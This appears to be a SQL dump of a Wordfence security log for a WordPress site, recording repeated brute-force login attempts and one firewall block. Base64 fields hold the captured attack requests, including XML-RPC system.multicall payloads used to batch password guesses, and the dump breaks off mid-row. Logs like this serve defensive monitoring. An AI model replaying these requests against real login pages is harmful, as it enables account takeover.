(76,1691940599.186900,1691940598.926873,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMgpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(77,1691940601.352400,1691940601.104784,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDczCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(78,0.000000,1691940759.646576,'\0\0\0\0\0\0\0\0\0\0R',0,503,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(79,1691940985.402000,1691940985.143193,'\0\0\0\0\0\0\0\0\0\0g\Z',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(80,1691940987.670300,1691940987.405517,'\0\0\0\0\0\0\0\0\0\0g\Z',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNQpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(81,1691940990.220000,1691940989.956545,'\0\0\0\0\0\0\0\0\0\0g\Z',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDgxCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(82,1691941213.618200,1691941213.361846,'\0\0\0\0\0\0\0\0\0\0\'iF',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(83,1691941216.436700,1691941216.168772,'\0\0\0\0\0\0\0\0\0\0\'iF',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNQpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(84,1691941220.287900,1691941220.007899,'\0\0\0\0\0\0\0\0\0\0\'iF',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc3CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(85,1691941328.161600,1691941327.900133,'\0\0\0\0\0\0\0\0\0\0g\"',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(86,1691941330.814500,1691941330.563922,'\0\0\0\0\0\0\0\0\0\0g\"',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwOApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(87,1691941333.804100,1691941333.536320,'\0\0\0\0\0\0\0\0\0\0g\"',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc2CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(88,1691941643.252400,1691941643.003723,'\0\0\0\0\0\0\0\0\0\0#Qa',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(89,1691941644.975100,1691941644.686932,'\0\0\0\0\0\0\0\0\0\0#Qa',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMQpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(90,1691941646.888900,1691941646.640078,'\0\0\0\0\0\0\0\0\0\0#Qa',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc0CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(91,0.000000,1691941917.879915,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(92,1691941980.872700,1691941980.602998,'\0\0\0\0\0\0\0\0\0\0#ru',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(93,1691941983.615300,1691941983.359194,'\0\0\0\0\0\0\0\0\0\0#ru',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0